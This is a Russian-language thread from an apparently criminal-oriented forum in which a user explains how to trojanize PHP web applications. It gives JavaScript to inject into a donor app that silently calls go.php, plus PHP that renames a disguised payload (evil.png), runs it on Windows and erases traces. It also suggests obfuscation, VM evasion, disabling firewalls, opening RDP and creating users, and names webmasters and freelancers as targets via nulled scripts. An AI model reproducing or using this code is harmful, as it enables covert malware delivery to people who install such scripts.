• Администрация не несет никакой ответственности за публикации на данном форуме. Если Вы считаете, что в темах и сообщениях может содержаться информация, запрещенная к распространению, просим незамедлительно сообщить Администрации. Abuse email: abuse@darkwebs.ws

Трояним с помощью php

Cyanide

новичок

Cyanide

новичок
Статус
Offline
Регистрация
05.11.2016
Сообщения
20
Репутация
11
Для того, чтобы затроянить кого-то с помощью php, нам нужен скрипт-донор, троян и 2 файла. Наша жертва должна запустить скрипт на локалкхосте (Denwer, AMPPS, AppServ, EasyPHP, Nimp, Xampp и т.д.). Обязательно указывайте, что надо протестировать софт на локалке (особенно, если встраиваете в нулл), либо встраивайте троян в скрипты, которые предполагается запускать только на локалхосте.
[HIDE]
Нам нужно:
1. script.js
2. go.php
3. evil.png (троян с измененным расширением)
4. Веб-приложение донор.
[/HIDE]
Инклюдим в донора файл script.js:
[HIDE]
// чтобы работал ajax
function getXmlHttp(){
var xmlhttp;
try {
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (E) {
xmlhttp = false;
}
}
if (!xmlhttp && typeof XMLHttpRequest!='undefined') {
xmlhttp = new XMLHttpRequest();
}
return xmlhttp;
}

// Запуск скрипта go.php.

//###start456789
var x = getXmlHttp(); x.open('GET', '/go.php', true);
x.onreadystatechange = function() {
if (x.readyState == 4) {if(x.status == 200) {}}};
x.send(null);
//###end456789

//Любой код далее
[/HIDE]
Вы можете вставить приведенный выше кусок текста в любой js-скрипт, используемый приложением которое мы трояним. В этом коде посылается ajax-запрос на некий скрипт под названием go.php. Теперь посмотрим, что находится в скрипте go.php:
[HIDE]
<?php
//подготавливаем троян
rename("evil.png","evil.exe");
//удаляем этот скрипт
unlink('go.php');

//Чистим следы в script.js
$source = file_get_contents('script.js');
preg_replace ("//###start456789[\s|\S]*//###end456789","",$source);
$fh = fopen('script.js','w');
fwrite($fh, $source);
fclose($fh);

//Работаем только на win
$pos =strpos(php_uname(), "Win");
if($pos !== False){
exec('evil.exe');
}
//удаляем троян, если он сам не удалился или мы не на винде
unlink('evil.exe');
[/HIDE]
Если вы уверены на 100% что жертва сидит на Win7, Vista, XP, то переименовывать в .exe не обязательно. Работа скрипта будет еще беспалевнее:
[HIDE]
<?php
//удаляем этот скрипт
unlink('go.php');

//Чистим следы в script.js
$source = file_get_contents('script.js');
preg_replace ("//###start456789[\s|\S]*//###end456789","",$source);
$fh = fopen('script.js','w');
fwrite($fh, $source);
fclose($fh);

//Работаем только на win
$pos =strpos(php_uname(), "Win");
if($pos !== False){
exec('evil.png');
}
//удаляем троян, если он сам не удалился или мы не на винде
unlink('evil.png');
[/HIDE]
Концепция думаю понятна. Результат (вместо запуска трояна - exec('calc.exe')):

Что можно еще сделать/добавить? Одепты уже догадались:
[HIDE]
Обфускация скриптов
Сборка трояна из нескольких файлов
Запуск трояна из запароленного архива
Проверка доступа к интернету
Проверка на запуск в виртуальных машинах
Используем командную строку на всю катушку (отключаем файрволл, открываем telnet, rdp, smb, создаем нового пользователя и т.д.)
Если функция exec запрещена, пробуем использовать другие (system, passthru, proc_open, shell_exec, popen...)
Добавить некие действия, если скрипт запускается под linux, macOS.
Разумеется для большей беспалевности, можно менять названия файлов, прятать их во вложенные папки и т.д. При желании, можно впихнуть все в один файл (троян, js, php), можно обойтись без троянов - создать юзера, открыть доступ по RDP, отправить на гейт IP.
[/HIDE]
Кто может стать целью?

Вебмастера(легко встроить в дорген, спамилку, парсер, чекалку, нуленный скрипт, очередную кнопку "бабло")
Веб-студии, фрилансеры, быдлокодеры (под предлогом доработки "сайта", скрипта)
Школо-хеккеры (приватный менеджер шеллов, локальный генератор фейков, дамп форума и т.д.)
Публика довольно узкая, но весьма интересная. И разумеется, никто не запрещает оставить php-бекдор и стучалку, на случай запуска скрипта в интернетах, но это уже совсем другая история...
 

overtose

Резидент

overtose

Резидент
Статус
Offline
Регистрация
29.09.2016
Сообщения
305
Репутация
206
баян же...
 

vilko

новичок

vilko

новичок
Статус
Offline
Регистрация
14.06.2019
Сообщения
4
Репутация
1
Такие способы будут работать до тех пор, пока человеческая лень и/или незнание не будут истреблены. Технические нюансы, разумеется, нужно учитывать и они варьируются от системы к системе, но сама суть 100% рабочая.
 

О нас

  • DarkWebs.ws — форум, посвященный вопросам заработка в интернете, различные схемы мошенников, IT вопросам и многое другое. Это форум о заработке в сети интернет.

ОТВЕТСТВЕННОСТЬ

  • Администрация не несет никакой ответственности за публикации на данном форуме. Если Вы считаете, что в темах и сообщениях может содержаться информация, запрещенная к распространению, просим незамедлительно сообщить Администрации.

    Abuse email: abuse@darkwebs.ws

  • Партнеры

    • Яндекс.Метрика